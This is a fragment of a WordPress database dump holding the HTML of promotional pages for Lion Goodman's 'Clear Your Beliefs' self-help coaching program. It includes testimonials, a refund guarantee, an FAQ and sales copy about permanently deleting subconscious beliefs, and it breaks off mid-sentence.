wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:30:29', '2015-07-08 14:30:29', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2226, 2, '2015-07-08 09:21:02', '2015-07-08 14:21:02', '&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nLearn to change your beliefs, and your limitations will disappear.\r\nYour possibilities will then become unlimited.</strong>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\r\n\r\nRelease pain and hurts from the past\r\nOpen to deeper, more profound love\r\nRecognize your true spiritual nature\r\nBecome more calm and less reactive\r\nRediscover the source of your personal power\r\n\r\nClear whatever stops you from taking action\r\nOpen yourself to new possibilities of success\r\nEliminate blocks and barriers easily\r\nDiscover your true purpose\r\nExpress your true magnificence\r\n\r\n<h2>How and Why It Works So Well</h2>\r\n\r\nBeliefs are the major cause of unhappiness, upsets, and limitations.\r\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\r\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\r\nYou''re in charge – you decide what you want to believe, and how far you want to go.\r\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\r\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\r\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter size-thumbnail wp-image-1475" /></a></p>\r\n\r\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\r\n\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\r\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n&nbsp;</p>\r\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\r\n<p>&nbsp;</p>\r\n<h1>Why Does This Happen?</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\r\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\r\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\r\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\r\n<p><strong>We literally create our reality with our beliefs.</strong></p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\r\n<p>&nbsp;</p>\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\r\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\r\n\r\n<strong><em>I''m not enough.</em></strong>\r\n<strong><em>I can''t do it.</em></strong>\r\n<strong><em>I''m not worthy.</em></strong>\r\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\r\n<strong><em>I''m all alone.</em></strong>\r\n\r\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\r\n<strong><em>There''s something wrong with me.</em></strong>\r\n<strong><em>I''m fundamentally flawed.</em></strong>\r\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\r\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\r\n\r\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\r\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\r\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p>The same thing is true in your subconscious mind:</p>\r\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\r\n<p><strong>It''s that simple.</strong></p>\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n\r\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\r\n\r\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\r\n\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n\r\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\r\n\r\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\r\n\r\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\r\n\r\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\r\n\r\n<p><strong> It''s that simple.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\n\r\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\r\n\r\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\r\n\r\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\r\n\r\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why We React The Way We Do</h1>\r\n\r\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\r\n\r\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\r\n\r\n<p>\r\n</p>\r\nWhy did I say that?\r\nWhat''s wrong with me?\r\nWhy didn''t I follow through?\r\nWhy did I react that way?\r\nWhat the hell just happened?\r\n\r\n<p><em></p>\r\n\r\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\r\n\r\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\r\n\r\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n\r\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\r\n\r\n<p><strong>Here''s why:</strong></p>\r\n\r\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\r\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\r\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\r\n\r\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Here''s Some Good News</h1>\r\n\r\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\r\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\r\n\r\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\r\n\r\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\r\n\r\n<h1>Imagine The Life You Desire</h1>\r\n\r\n<p><strong>Can you imagine this?</strong></p>\r\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\r\n<p>You''re no longer held back by old beliefs and stories.</p>\r\n<p>There''s no resistance to doing what needs to be done.</p>\r\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\r\n<p>&nbsp;</p>\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n\r\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\r\n\r\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\r\n\r\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\r\n\r\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>Clear Whatever Is In The Way</h1>\r\n\r\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\r\n\r\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\r\n\r\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\r\n\r\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n\r\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\r\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\r\nGive you the power to change your experiences – and your circumstances – at will.\r\nShow you how to gain mastery over your moods, perceptions, and responses.\r\n\r\n<p>&nbsp;</p>\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\r\n\r\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\r\n\r\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\r\n\r\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\r\n\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n\r\n<p>\r\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\r\nRemove resistance and barriers\r\nOpen doors to new opportunities\r\nEliminate pain and suffering from the past\r\nExperience more fulfillment in your relationships\r\nAttract more abundance and prosperity\r\nIncrease your energy, vitality, and 